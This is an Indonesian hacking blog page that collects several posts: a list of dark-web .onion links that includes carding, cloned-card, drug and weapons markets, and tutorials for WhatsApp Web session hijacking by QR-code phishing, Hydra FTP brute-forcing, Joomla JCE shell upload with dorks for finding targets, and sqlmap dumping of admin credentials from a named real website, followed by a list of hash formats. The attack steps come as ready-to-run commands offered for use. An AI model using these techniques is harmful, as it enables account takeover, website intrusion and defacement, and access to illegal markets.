Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts
Daftar Dark Web Atau Situs Gelap 2016

Daftar Dark Web Atau Situs Gelap 2016

Daftar Darkweb Atau Situs Gelap Atau Underground web - Pasti sobat-sobat semua udah tidak asing lagi dengan situs semacam ini, situs yang kita kenal dengan julukan DeepWeb iya itu dia yang sekarang mau saya bicarakan, situs yang mungkin sudah lama tenggelam keberadaan nya, dan sangat sulit untuk menemukan nya, jika ada yang tanya ada apa saja di dalam situs DeepWeb, saya jawab banyak deh, jika dibuat perbandingan, 100% di google, itu hanya 1% di situs DeepWeb, jadi kalian mau nyari apa saja pasti ada, dari mulai Pembunuh bayaran, narkotika, porn, hacker, communitas penyiksa anak-anak bahkan sampe kanibal pun ada di dalam situs tersebut.

Pengalaman Saya Sendiri

Buat saya sih senang yah bisa menemukan situs tersebut, yah mempunyai rasa bangga tersendiri lah, kenapa kok saya bisa bangga, jawabannya sangatlah sederhana, karena saya menemukan hal baru untuk bahan pembelajaran, bisa dibilang buat menambah wawasan lah,

Bagaimana Cara Untuk Mengakses nya

Oke untuk mengaksesnya kita harus bener-bener hati-hati karena didalam situs tersebut banya hacker-hacker internasional, yang sewaktu-waktu bisa menggunakan data kita untuk kejahatan, itulah alasanya kenapa kita harus berhati-hati untuk mengaksesnya.

Terus Gimana Cara Aman Untuk Mengakses Nya

Recomendasi dari saya - sebelum kalian masuk kesitus tersebut, sebaiknya siapkan privasi atau pondasi yang kuat untuk data pribadi kita, Sebaik nya kalian berselancar menggunakan Tor browser, dengan menggunakan Tor Browser kita bisa berselancar tanpa rasa khawatir lagi.

Jika Menggukan Android

  • Install Orbot ( Cari di play store )
  • Install Orfox ( Cari di play store )
Untuk menjalankan kedua aplikasi tersebut bisa cari di mbah google yah, banyak kok, maaf gak saya jelasin disini karena disini saya cuma ingin berbagi pengalaman, dan ingin berbagi link-link yang saya temukan di DeepWeb, seperti yang tertera di judul atas, terdapat 2000 link yang sudah saya temukan.

Jika Menggunakan Os Kali Linux

Kalian bisa bacaCara mengistall Tor Browser di kali linux

Oke Dibawah Ini Adalah Link Nya

Sebuah peringatan sebelum Anda melangkah lebih jauh!
Setelah Anda masuk ke Web gelap, Anda * akan * dapat mengakses situs-situs yang tabloid merujuk. Ini berarti bahwa Anda bisa menjadi klik dari situs yang menjual obat-obatan dan senjata, dan - terus terang - hal yang lebih buruk.

Artikel ini dimaksudkan sebagai panduan untuk apa Web Gelap - tidak dukungan atau dorongan bagi Anda untuk mulai bersikap dalam perilaku ilegal atau tidak bermoral.



  1. Xillia (yang legit kembali hari di pasar) http: //cjgxp5lockl6aoyg.onion
  2. http: //cjgxp5lockl6aoyg.onion/worldwide-cardable-sites-by-alex
  3. http: //cjgxp5lockl6aoyg.onion/selling-paypal-accounts-with-balance-upto-5000dollars
  4. http: //cjgxp5lockl6aoyg.onion/cloned-credit-cards-free-shipping
  5. Amberoad http: //amberoadychffmyw.onion
  6. KognitionsKyrkan http: //wd43uqrbjwe6hpre.onion
  7. Malina http: //malina2ihfyawiau.onion
  8. BB Kompendium http: //jq.26zp5ygkpszripvv.onion
  9. halaman Hackbb index (hati-hati) http: //zalitsnkm3wflnwa.onion
  10. Dapur http ibu: //momskit2z36hhuoo.onion
  11. spearpeng http: //spearpengkonpuoo.onion
  12. psyced http: //yjnnqkxfnxcrle7a.onion/de/home.page
  13. banyak hal http: //3uifimikyzy7v53o.onion/cgi-bin/link/linkliste.cgi
  14. c.pozzi http: //hakteamvayuhxoe7.onion/c.pozzi
  15. "Google" (undangan hanya begitu tampaknya) http: //managerw4wjhakby.onion/login.php
  16. Bio Hazard http: //njto3uretienojic.onion
  17. Oh Hai. http: //pl7ph5csmnwzlcuo.onion
  18. Psy Komunitas UA http: //psyco42coib33wfl.onion/cgi-bin/yabb2/YaBB.pl
  19. http Itphx: //snvb5ffurikzeiod.onion
  20. Beberapa forum Cina http: //xkow4dnkw7cusncz.onion
  21. 登录 http: //22u75kqyl666joi2.onion
  22. Пламен Горанов http: //37ot4pnfucktimyr.onion
  23. http Akademiet 3D: //3dlabhf34kgeg2r6.onion
  24. AdminLTE Dashboard http: //b77hgnafzdsqhx2p.onion
  25. MESIN PENCARI
  26. Torch http: //xmh57jrzrnw6insl.onion
  27. Torch http: //u7lqvkufrapz2ept.onion
  28. Gram http: //grams7enufi7jmdl.onion
  29. Gram (hati-hati) http: //s42qgnh4kesd5odo.onion
  30. Berusaha Cari http: //oq7hx5d4ip24ay2f.onion
  31. Tidak Jahat http: //hss3uro2hsxfogfq.onion
  32. Ahmia (juga Clearnet) http: //msydqstlz2kzerdg.onion/search
  33. DuckDuckGo https: //3g2upl4pq6kufc4m.onion
  34. El-Goog! http: //hbzfev4o4cgfkimg.onion
  35. http Searx: //lqdnpadpys4snom2.onion
  36. http Searx: //searchb5a7tmimez.onion
  37. http Searx: //ulrn6sryqaifefld.onion
  38. OSP googolplex http: //googolplexc324wu.onion
  39. http IIVW: //llvwfy2hc2fbawzb.onion
  40. BTDigg DHT Search Engine http://btdigg63cdjmmmqj.onion
  41. http Candle: //t7tvvkx5vc3cvj6l.onion
  42. Wiki
  43. Tor Wiki http:? //torwikignoueupfm.onion/index.php Title = Main_Page
  44. The Hidden Wiki http: //zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page
  45. The Hidden Wiki http: //wikitjerrta4qgz4.onion
  46. The Hidden Wiki http: //n6pbizsbykwxmydz.onion/index.php/Main_Page
  47. The Hidden Wiki http: //thwikihlbdf6eyop.onion/wiki/index.php/Main_Page
  48. The Hidden Wiki http: //kpvz7ki2lzvnwve7.onion/index.php/Main_Page
  49. The Hidden Wiki http: //nqigfqrxnkwcqmiq.onion/wiki
  50. The Hidden Wiki http: //wikitorcwogtsifs.onion/index.php/Main_Page
  51. The Hidden Wiki http: //7uamutiih4fkxyol.onion/index.php/Main_Page
  52. Tersembunyi Wiki 日本 http: //k2mlwxjrestnu32p.onion
  53. Tersembunyi Wiki http: //hwikis252zk2m3au.onion
  54. Tersembunyi Wiki http: //wikitjerm7hvsork.onion
  55. The Uncensored Tersembunyi wiki http: //uhwikih256ynt57t.onion/wiki/index.php/Main_Page
  56. The Uncensored Tersembunyi wiki http: //kpvz7vokigja2k5x.onion/wiki/index.php/Main_Page
  57. Tor Hidden Layanan Wiki http: //hswiki2acitzsxbs.onion/doku.php
  58. Semua Anda Wiki http: //allyour4nert7pkh.onion: 88 / wiki / index.php title = Main_Page
  59. Proyek PM http: //projpmcxufvim7be.onion/wiki/Main_Page
  60. LulzWiki http:? //b6lmqk6ovmfhrm4a.onion/wiki/index.php Title = Main_Page
  61. CryptoParty Austria http: //cmoqohtgyilgec7y.onion
  62. Движение без имени http: //buehmwfjrvyqdnrl.onion
  63. Vuze Wiki http: //dr5aamfveql2b34p.onion
  64. D3xt3r01 Wiki http:? //pcl5dt2boqqvmpk7.onion/index.php Title = Main_Page
  65. ????? http: //fkzkqpxfvr7i5p4k.onion
  66. The Dark Daftar http:? //uxxasdkkxtrzppvv.onion/index.php Title = Main_Page
  67. Foswiki http: //wzvj76zosr22og7r.onion/wiki/bin/view/Main/HiddenStuff
  68. Jiskopedia http: //zqktlwi4fecvo6ri.onion/wiki/Jiskopedia
  69. ET Wiki http: //oletfvgk2xc3eq6z.onio

  70. SITELISTS / DIREKTORI

  71. Namun lain Tor Dir http: //bdpuqvsqmphctrcs.onion
  72. Burnout http: //burnoutxf6o2yvsw.onion
  73. Torx http: //pdizimmrq5mwjkun.onion
  74. Parazite 1 http: //kpynyvym6xqi7wz2.onion
  75. Parazite 2 http: //qx7j2selmom4ioxf.onion
  76. UnderDir Undernet Direktori http: //underdj5ziov3ic7.onion
  77. Tor.Onion Onionlist http: //jh32yv5zgayyyts3.onion
  78. Harry71 (Spider) http: //skunksworkedp2cg.onion/sites.html
  79. Tersembunyi Link V0.1.1 http: //hlinkhign4obv3a3.onion
  80. Bawang Url http Repository: //32rfckwuorlf4dlv.onion
  81. OnionDir oleh Anno006 http: //auutwvpt2zktxwng.onion
  82. OnionDir Link Directory http: //dirnxxdraygbifgc.onion
  83. OnionDir Link Directory http: //dirnxldxoyajdetq.onion
  84. Link Web gelap & More! http: //jdpskjmgy6kk4urv.onion/links.html
  85. PrivateFox Bookmarks http: //pfoxkwl5vxfgbp2c.onion/bookmarks.htm
  86. Bawang Link List http: //linklistpugaiwpi.onion
  87. TorLinks http: //torlinkbgs6aabns.onion
  88. Technodrome http: //54ogum7gwxhtgiya.onion/blog/index.php/catalog
  89. http://uhwikih256ynt57t.onion/wiki/index.php/Jolly_Roger%E2%80%99s_Security_Guide_for_Beginners
  90. Onion Up? http: //onionuptst6up7n2.onion
  91. TorStatus http: //jlve2y45zacpbz6s.onion
  92. Pengantar Deepweb http: //tx.m5uj4ir5maaux43p.onion
  93. Deep Web di http Singkatnya: //dtt6tdtgroj63iud.onion
  94. Stream.i2p / Stream.onion http: //streamtmr46ysxw6.onion
  95. Keybase http: //fncuwbiisyh6ak3i.onion
  96. GnuPG http: //ic6au7wa3f6naxjq.onion
  97. http Silkroad3: //silkrgkmqqywyns3.onion
  98. Cepat dan kotor http name generator: //qkndirty6fifcrdk.onion
  99. Grayhood http: //bcyey3cgfah3scjs.onion: 4242
  100. Maxima Culpa (pengakuan) http: //nsmgu2mglfj7za6s.onion
  101. Anonymous Confessions http: //confessx3gx46lwg.onion
  102. Tersembunyi Layanan # 35 (banyak dari mereka) http: //xt2aqjdysma2sb2o.onion
  103. Di bawah VT http: //74ypjqjwf6oejmax.onion
  104. Mendanai Perjuangan http Islam: //teir4baj5mpvkg5n.onion
  105. Indymedia keyserver https: //qtt2yl5jocgrk7nu.onion
  106. Onion Soup http: //soupksx6vqh3ydda.onion
  107. Onion Soup http: //soupkzkuaxkjsuz3.onion
  108. Sihir & Steamwork http: //kaarvixjxfdy2wv2.onion
  109. Surveillance Hukum http: //7vrl523532rjjznj.onion
  110. Besar Empire of Earth http: //rgeo5wj7gneidzh3.onion
  111. The Linux Documentation Project http: //3c2rvufmbcggnqi6.onion
  112. Txtorcon http: //timaq4ygg2iegci7.onion
  113. Hal Lewatlah (model 3D-printer) http: //32ixi6myw3things.onion
  114. Max Keamanan dengan GPG http://uhwikih256ynt57t.onion/wiki/index.php/Maximum_security_with_gpg
  115. XL33tVill3 http: //tt75atziadj4duff.onion
  116. Bagaimana Anda akan memberitahu dunia? http: //rjzdqt4z3z3xo73h.onion
  117. Soylent Berita http: //7rmath4ro2of2a42.onion
  118. Technodrome http: //54ogum7gwxhtgiya.onion

  119. CHATS / IM / EMAIL

  120. OnionNet http: //ubbchzof2pxs4swi.onion
  121. http Anarplex: //y5fmhyqdr6r7ddws.onion/agorairc
  122. RetroShare Chatserver http: //chat7zlxojqcf3nv.onion
  123. Innocense Lepas Pantai Mail http: //inocncymyac2mufx.onion
  124. http Volatile: //vola7ileiax4ueow.onion
  125. Riseup http: //zsolxunfmbfuq7wf.onion/rc
  126. Eliza ChatBot http: //opnju4nyz7wbypme.onion
  127. OnionIRC irc: //cgl7owaxduu2eupi.onion: 6667
  128. Freenode IRC irc: //2hktdmgt6bg2hjuc.onion
  129. Freenode IRC irc: //frxleqtzgvwkv7oz.onion
  130. Freenode IRC irc: //4wvhvf666nifnpg.onion
  131. Freenode IRC irc: //p4fsi4ockecnea7l.onion
  132. Freenode IRC irc: //p567hbjdstqvg7xw.onion
  133. Freenode IRC irc: //vgh6tbfjk65zj5ep.onion
  134. irc2p bawang gerbang Eselon irc: //zj45fq6q5f7m56z2.onion: 6667
  135. irc2p bawang gerbang Postman irc: //irc2p5zrbdk25rdy.onion: 6667
  136. irc2p bawang gerbang gelap Tunnel irc: //hkvxwfvs7glrnymv.onion: 6668
  137. The Loli Advokasi Server irc: //lolikaastbgo5dtk.onion: 6667
  138. OpenSource Obat Ngobrol irc: //e2ymwjy6mzy4hx3t.onion: 6669
  139. Josephswilliams irc: //ntwrkhhtqv73vwd4.onion: 6667
  140. FreedomIRC irc: //jscrakoresh4ubgh.onion: 6667
  141. KillYourIRC irc: //e4bqnvfdasnx4plk.onion: 6667
  142. Hackint PMI: //nakufgztylanf4mw.onion: 9999
  143. Agora Anonymous irc: //cfyfz6afpgfeirst.onion: 6667
  144. HeavyCrypto PMI: //jdobmyzmx4bh7n25.onion: 6697
  145. KeratNet irc: //vgg6whpouebbcx7w.onion: 6667
  146. ANYChat irc: //chatjnv7sshcuz6a.onion: 6667
  147. Anonimowy IRC irc: //itapxk4hwi3k5ktj.onion: 6667
  148. NeoturbineNET IRC irc: //qnwpupud3hyir6qp.onion: 6697
  149. JDQIRC http: //jdqircugmdiix4gq.onion/about.html
  150. TorChat Direktori http: //e4c4xzz3hl772fti.onion
  151. Amun-RA http: //goatwwwbm2lbkbor.onion
  152. TeenSphere obrolan http: //paef74x6wbxbzirx.onion/chat
  153. Irc2p irc: //ogn5vbujhrvbihko.onion

  154. JARINGAN SOCIAL

  155. Galaxy2 http: //w363zoq3ylux5rf5.onion
  156. Multiverse Jaringan Sosial http: //imwkdn62pvr6jueo.onion
  157. http noncore: //f7xvwjdym4cb5zl5.onion
  158. TorBook http: //torbookntnjusnqd.onion
  159. BlackBook http: //blkbook3fxhcsn3u.onion
  160. The Uncensored http Sosial: //uncensor576gcmsi.onion
  161. http Diaspora: //c62bejwho55ketsi.onion
  162. DoubleDutch Diaspora http: //i2f4wczq2mzghxll.onion
  163. Weasyl http: //weasylartw55noh2.onion
  164. Kotoran anjing https: //facebookcorewwwi.onion

  165. PASAR/TOKO

  166. Vault43 (review pasar) http: //vaulty2wxwm2ukf3.onion
  167. Gram Market Cari http: //grams7enufi7jmdl.onion/markets
  168. Hub (saran pasar) http: //thehub7gqe43miyc.onion
  169. http Agora Market: //agorahooawayyfoe.onion
  170. Agora Market Forum http: //lacbzxobeprssrfx.onion
  171. Agora Pasar Undang http: //agorahooawayyfoe.onion/register/S11mNAX1am
  172. RAMP http: //ramp2bombkadwvgz.onion
  173. http AlphaBay Market: //pwoah7foa6au2pul.onion
  174. AlphaBay Market Forum http: //pwoah7foa6au2pul.onion/forum
  175. Amazon Gelap http: //amazon435hm6h3ye.onion
  176. Inti http Market: //nucleuspf3izq7o6.onion
  177. Nucleus Market Forum http: //z34uj4opd3tejafn.onion
  178. Melarang Market http: //outfor6jwcztwbpd.onion
  179. Outlaw Forum Pasar http: //outforumbpapnpqr.onion
  180. The Majestic Taman http: //2mybnercfcums5lj.onion
  181. The Majestic Taman Forum http: //bm26rwk32m7u7rec.onion
  182. http Tochka Gratis Market: //tochka3evlj3sxdv.onion
  183. http BlackBank Market: //wztyb7vlfcw6l4xd.onion
  184. BlackBank Market Forum http: //kth2mwuwlkezwziy.onion
  185. Mimpi Market http: //lchudifyeqm4ldjj.onion
  186. The Green Machine http: //zzq7gpluliw6iq7l.onion
  187. Bawang Perdagangan http: //mhsaby5zjddolddv.onion
  188. Pasar http Jah: //jm77xadoe3yajj3c.onion
  189. Karden ini Gun Toko http: //kardencdyzqdqfka.onion
  190. Executive Hasil http: //5zkfuvtrpotg2nzd.onion
  191. The Armory http: //armoryx7kvdq3jds.onion
  192. EuroGuns (hati-hati) http: //2kka4f23pcxgqkpv.onion
  193. Mr Nice Guy (hati-hati) http: //niceguyfa3xkuuoq.onion
  194. Senapan dan Pistols http: //au4rxdo57jdnzbtq.onion
  195. Bank of Tor http: //hp4rsicl6sbpuy4l.onion
  196. Black Market Senjata http: //gunsammoaahtpmqs.onion
  197. NLGrowers (hati-hati) http: //25ffhe3ppwxs7kvz.onion/info.php
  198. Abraxas Market (bocor Clearnet ip) http: //abraxasdegupusel.onion/login
  199. Market Forum Abraxas (hati-hati) http: //abraxasgacelesox.onion
  200. http Bloomsfield: //spr3udtjiegxevzt.onion
  201. Crypto http Market: //cryptomktgxdn2zd.onion
  202. Heroes Darknet http League: //darkheroesq46awl.onion
  203. East India Company http: //g4c35ipwiutqccly.onion/login
  204. Earth Tengah Marketplace http: //mango7u3rivtwxy7.onion
  205. Oksigen Marketplace http: //o2oxycuvnwxhv73e.onion
  206. Silkkitie http: //silkkitiehdg5mug.onion/kirjaudu
  207. Masyarakat Drug Store http: //newpdsuslmzqazvr.onion
  208. UK Senjata dan amunisi Toko http: //tuu66yxvrnn3of7l.onion
  209. Smokeables http: //smoker32pk4qt3mx.onion
  210. EuCanna http: //rso4hutlefirefqp.onion
  211. CannabisUK http: //fzqnrlcvhkgbdwx5.onion
  212. Cerberus Underground (segera hadir) http: //jhb3yqahbj27hscy.onion
  213. DeDope http: //kbvbh4kdddiha2ht.onion
  214. BitPharma http: //s5q54hfww56ov2xc.onion
  215. http Brainmagic: //ll6lardicrvrljvq.onion
  216. Kamagra Untuk Bitcoin http: //k4btcoezc5tlxyaf.onion
  217. Hanya Cigs http: //cigs7cviqbi4bvuy.onion
  218. Green Dragon http: //greendrgfjz7ks5f.onion
  219. Chris Carter http: //weedd42ka6nmlmty.onion
  220. Lim Obat http: //lwi7v5zxn7d4anek.onion
  221. Lim Obat http: //pdqamq4ij4lp4mjw.onion
  222. HonestCocaine ini Toko http: //honestcqcmljqczq.onion
  223. http Bazaar: //bazaar7h4ol6a3xu.onion
  224. DrugMarket http: //4yjes6zfucnh7vcj.onion
  225. Dealer emas http: //fxwyfqrcj67nxal3.onion
  226. Hijau http Jalan: //greenroxwc5po3ab.onion
  227. Swasta http Market: //cqxalq3h7uynx7th.onion
  228. Ukraina http Community: //psyco42coib33wfl.onion
  229. Polandia Hitam http Market: //ig6ndt6anbg2dimk.onion
  230. THCPREMIUM http: //uc4dewuu7g4fnlkr.onion
  231. TeamLotus (kupon) http: //v22g2o2smqhkji37.onion
  232. Cina Mafia http: //jaf3r3rfjvongcox.onion
  233. SwissShop http: //ahtlucz5e5vpbuvk.onion
  234. EpicMarket http: //epicmarketbbhhmm.onion

Cara Hack QR Code Of "Whatsapp Web" Menggunakan Phishing Teknik Dalam Kali Linux 2.0



Whatsapp adalah salah satu aplikasi messaging yang paling populer yang tersedia untuk hampir semua sistem operasi seperti windows, android, mac, blackberry dll ...

Untuk memberikan akses whatsapp pada browser, meluncurkan web whatsapp, dijamin dan dilindungi dengan Akhir Untuk Akhir Encryption . Ada banyak tentang alat dan aplikasi yang tersedia di pasar yang mengklaim akun whatsapp hack, pesan whatsapp hack, mata-mata whatsapp menggunakan alat hack whatsapp tapi semua aplikasi ini palsu dan tidak bekerja sama sekali. Mawalu dikembangkan dan uploded alat pada github yang memungkinkan dia untuk mengkloning QR Code of web whatsapp, digunakan untuk hack akun pengguna web whatsapp.

Yang Kita Butuhkan
  • Kali Linux 2.0
  • Firefox Browser
  • Server Standalone Selenium
  • Halaman Phishing (halaman Web phishing Whatsapp)
Hack Whatsapp web menggunakan teknik phishing di Kali linux 2.0
  • Update Kali linux 2.0 menggunakan perintah di bawah ini
apt-get Update

  •  Sekarang Download dan install browser Firefox
apt-get install firefox Xvfb

wget http://selenium-release.storage.googleapis.com/2.43/selenium-server-standalone-2.43.1.jar

  •  Setelah menginstal firefox dan selenium, jalankan perintah di bawah ini di terminal
java -jar selenium-server.jar

  •  Sekarang buka terminal dan clone whatsapp halaman phishing baru dari github
git clone https://github.com/Mawalu/whatsapp-phishing.git

  •  Sekarang mengubah direktori ke WhatsApp halaman phishing
cd whatsapp-phishing

  •  Sekarang instal node dan menjalankan file index.js
npm install node index.js

  •  Setelah mengeksekusi file index.js, buka browser dan ketik 127.0.0.1 ke url baru
  • Pindah ke web whatsapp di smartphone Anda dengan pergi ke Menu> Whatsapp Web dan memindai QR code dari browser Anda
  • Setelah memindai kode QR, file baru akan menciptakan dalam direktori yang sama dengan pengguna details.Copy data dari rahasia baru dibuat mengajukan
  • Saatnya untuk Buka web.whatsapp.com kemudian Buka konsol pengembang Anda dan masukkan rincian berikut
> var t = CONTENT_OF_YOUR_SECRETS_FILE
> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(';'); token.c.forEach(function(cookie) {document.cookie = cookie; });} > login(t)

  • Reload Halaman
 Anda harus login sebagai orang yang dipindai kode QR

Program ini menggunakan node.js dan socket.io untuk website dan selenium, alat yang digunakan untuk browser scripting, untuk berkomunikasi dengan klien web Whatsapp. Program ini dimulai dengan http dan server socket.io. Jika klien baru terhubung ke socket.io aplikasi akan membuat permintaan untuk contoh selenium untuk memulai browser baru dan terhubung ke web.whatsapp.com.  Itu akan mengambil dan Ekstrak QR code dari Web WhatsApp dan posting ke klien melalui WebSocket yang  script sisi klien kemudian menunjukkan QR code bagi pengguna dan jika korban memindai QR code maka browser selenium dikendalikan mengirim kunci rahasia untuk penyerang kemudian penyerang mengambil data, dan menyimpannya ke file teks







Tutorial Hydra Part I ( Cracking FTP Account Using GUI Mode )

Hydra adalah suatu tools yang di gunakan untuk melakukan bruteforcing kepada akun tertentu di suatu jaringan atau server, contohnya FTP dan SSH. hydra adalah tools opensource, dan sudah bisa di install di segala platform termasuk windows, linux dan mac. tools ini memiliki dua versi yaitu, versi GUI dan versi CLI, pada kali ini saya akan memberikan contoh menggunakan GUI Mode. untuk lebih jelasnya tetang keterangan dari Hydra , bisa lihat di website aslinya di sini https://www.thc.org/thc-hydra/

Tutorial kali ini saya akan memberikan langkah-langkah untuk melakukan bruteforcing kepada akun FTP .

Berikut langkah-langkahnya :

1. Buka terminal , tekan ctrl+alt+T atau klik shortcut yang ada pada distro milik anda. sebelum melakukan cracking terhadap target, kita harus mengetahui apakah service FTP dan port target sedang aktif atau tidak. hal ini juga menjadi salah satu cara untuk para pemilik server , untuk tidak selalu mengaktifkan service FTP nya apabila tidak di butuhkan.

2. Ketik "nmap <host target atau ip server target>" seperti target berikut , saya menggunakan localhost sebagai target kali ini. maka saya ketik "nmap 127.0.0.1"

3. Ternyata service ftp sedang berjalan di host 127.0.0.1 dengan port 21 (port default dari FTP)

4. selanjutnya ketik "xhydra" untuk membuka hydra versi GUI, maka hasilnya akan keluar Hydra seperti berikut :

5. Pada tab target silahkan masukkan target pada textbox singgle target (apabila target cuma satu) pada target list masukkan file text berisi host target (apabila target lebih dari satu). pada contoh kali ini saya hanya memiliki 1 target yaitu localhost.
  • Masukkan nomer port yang aktif tadi, yaitu : 21
  • Pilih protocol yang menjadi target :  FTP
  • Centang "Be Verbose" agar, aksi yang di lakukan nanti akan memiliki history dan di tampilkan di layar.

6. Pada tab PASSWORDS Masukkan username dan password di textbox username dan password ( apabila hanya mempunyai satu username dan password ), masukkan di texbox username list dan password list ( apabila mempunyai lebih dari satu username dan password ) , pada textbox ini kita masukkan wordlist kita yang sudah kita punya.
pada contoh kali ini, saya memasukkan wordlist bernama rockbrute.txt . seperti pada gambar berikut :


Maka hasilnya akan seperti berikut :
  • Centang " try login as password " dan " try empty login ".

7. setelah semua di lakukan, waktunya kita jalankan aksinya. klik tab start, lalu tekan tombol start untuk memulai. tunggu sampai  aksi selesai. lama aksi ini tergantung dengan kerumitan user dan password yang di punya oleh pemilik akun ftp. hal ini dapat di manfaatkan oleh para pengguna FTP agar mengenkripsi user dan password miliknya agar tidak mudah di retas .


8. apablia berhasil, maka hasilnya akan seperti ini :

Login dengan username :  nobody
password : lampp


9.  untuk memeriksa apakah user dan password nya benar, selanjutnya kita akan mencoba login ke akun ftpnya menggunakan filezilla. 

masukkan host : 127.0.0.1 
username : nobody 
password : lampp
port : 21

NB : semua yang di isikan , tergantung pada hasil dan target yang anda punya.


bisa di lihat di atas , bahwa koneksi ke ftp berhasil. dan saya dapat mengakses semua file yang ada di dalam server target.

NB : sebelah kiri adalah direktori local , sebelah kanan adalah direktori server.

Hacking website Menggunakan Dork Joomla JCE Server Scaner Dan JCE Tools Uploder

Deface website pakai tool JCE uploder dan JCE Exploit Tool, sebenarnya alat perang yang sering di gunakan ada 2 macam, yang format perl dan php. kali ini saya mau share yang Perl dan Php

Dork (bisa di kembangin lagi)  :

  • inurl:"joomla/index.php?option=com_virtuemart"
  • inurl:"joomla/index.php?option=com_jce"
  • inurl:"index.php?option=com_jce"
  • inurl:"index.php?option=com_virtuemart"
  • inurl:"uk/index.php?option=com_virtuemart"
Download JCE uploder Shell Disini

Caranya
  • buka lewat localhost xamp ato yang gampang upload aja lewat shell
  • lalu akses filenya, maka akan nampak seperti ini :

Keterangan :
Hostname : Web Target ( Tanpa http: dan slash / )
Path : / atau /path/ (kalo ada pathnya)
Please Specify a file to upload : tempat upload shellmu
  • upload shellmu >> klik "start", kalo berhasil alamat shell akan tertera disitu, kalo failed cari target lain
Untuk Tool JCE server exploiter dan scaner

Download JCE Server Exploit scaner Disini
save ext perl atau bash



Warning :
Semua resiko anda sendiri yang tanggung.karena ini hanyalah sekedar pembelajaran, bukan untuk kejahatan.

Hacking Website Menggunakan Sqlmap Di Backbox Linux

Hacking Website Menggunakan Sqlmap Di Backbox Linux



Sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

biar lebih jelas saya akan menjelaskan sedikit tentang apa itu SQL injection dan database.

  • SQL injection adalah teknik hacking di mana attacker dapat menyisipkan perintah-perintah SQL melalu URL untuk di eksekusi oleh database. bug atau vulnerability ini terjadi karena kelalian seorang programer atau webmaster dalam melakukan pemograman web seperti tidak difilternya variabel dalam web tersebut.
  • Database adalah kumpulan informasi yang disimpan di dalam komputer atau webserver secara sistematik yang berguna untuk memperoleh informasi dari basis data tersebut.

Nah, di postingan kali ini saya mau sharing kepada anda ilmu yang saya dapat yaitu Sqlmap di Backbox Linux atau juga bisa ngedeface website tapi saya hanya sharing sampai caranya saja tidak untuk sampai menganti halaman depan website atau target.

Pertama buka sqlmap

Root@backbox:~# sqlmap -u http://www.tunesoman.com/product.php?id=200%27 --dbs
 tunggu hingga database target muncul seperti gambar di bawah ini :


website tersebut terdapat dua database yaitu :
available databases [2]:

[*] db363851433
[*] information_schema
saya pilih [*] db363851433 lalu lanjut dengan melihat isi table

Root@backbox:~# sqlmap -u http://www.tunesoman.com/product.php?id=200%27 -D db363851433 --tables

maka akan terlihat table seperti gambar di bawah ini :


site tersebut terdapat 26tables disini saya mau melihat tables admin_user dengan perintah


Root@backbox:~# sqlmap -u http://www.tunesoman.com/product.php?id=200%27 -D db363851433 -T admin_user --dump

maka akan dapat user dan password admin :v


Nah sampai disini sudah sangat-sangat jelas kalo sudah mendapat user dan password nya ya tinggal kita lakukan apa yang menjadi tujuan awal kita


Selamat Mencoba

Jenis Hash Password



Keterangan: Hash Adalah pensensor password biasanya untuk website atau sebagainya! untuk merubah password di barcode melalui symlink terutama untuk deface & hacking Website :)
Dan ini adalah jenis - jenis Hash yang harus anda ketahui bagi para hacking dan defacing xD

1. DES(Unix)
[+] Digunakan di Linux dan sejenisnya.
[+] Panjang : 13 Karakter.
[+] Deskripsi : Dua karakter pertama adalah salt (Karakter acak, di contoh kita saltnya adalah string "Iv.") kemudian diikuti oleh Hashnya.
[+] Contoh : IvS7aeT4NzQPM
2. Domain Cached Credentials
[+] Digunakan untuk mencache password-password domain windows.
[+] Panjang : 16 bytes (32 Karakter)
[+] Algorithm : MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))
[+] Contoh : Admin:b474d48cdfc4974d86ef4d24904cdd91
3. MD5(Unix)
[+] Digunakan di Linux dan sejenisnya.
[+] Panjang : 34 Karakter.
[+] Deskripsi : Hash dimulai dengan tanda $1$ kemudian dilanjutkan dengan salt (sampai dengan 8 karakter acak, di contoh kita saltnya adalah string "12345678") kemudian dilanjutkan dengan satu karakter lagi $ , kemudian diikuti oleh Hashnya.
[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2000 kali.
[+] Contoh : $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
4. MD5(APR)
[+] Digunakan di Linux dan sejenisnya.
[+] Panjang : 37 Karakter.
[+] Deskripsi : Hash dimulai dengan tanda $apr1$ , kemudian dilanjutkan dengan salt (sampai dengan 8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian dilanjutkan dengan satu karakter lagi $ , kemudian diikuti oleh Hashnya.
[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2000 kali.
[+] Contoh : $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.
5. MD5(phpBB3)
[+] Digunakan di phpBB 3.x.x.
[+] Panjang : 37 Karakter.
[+] Dekripsi : Hash dimulai dengan tanda $H$ kemudian diikuti dengan satu karakter (paling sering angka "9") kemudian diikuti dengan salt (8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian diikuti oleh Hashnya.
[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2048 kali.
[+] Contoh : $H$9123456785DAERgALpsri.D9z3ht120
6. MD5(Wordpress)
[+] Digunakan di Wordpress.
[+] Panjang : 34 Karakter.
[+] Deskripsi : Hash dimulai dengan tanda $P$ , kemudian diikuti dengan satu karakter (Paling sering huruf "B"), kemudian diikuti dengan salt (8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian diikuti oleh Hashnya.
[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 8192 kali.
[+] Contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01
7. MySQL
[+] Digunakan di MySQL versi lama.
[+] Panjang : 8 bytes.
[+] Deskripsi : Hash yang terdiri dari dua DWORD, masing-masing tidak melebihi nilai 0x7fffffff.
[+] Contoh : 606717496665bcba
8. MySQL5
[+] Digunakan di MySQL Versi baru.
[+] Panjang : 20 bytes.
[+] Algorithm : SHA-1(SHA-1($pass))
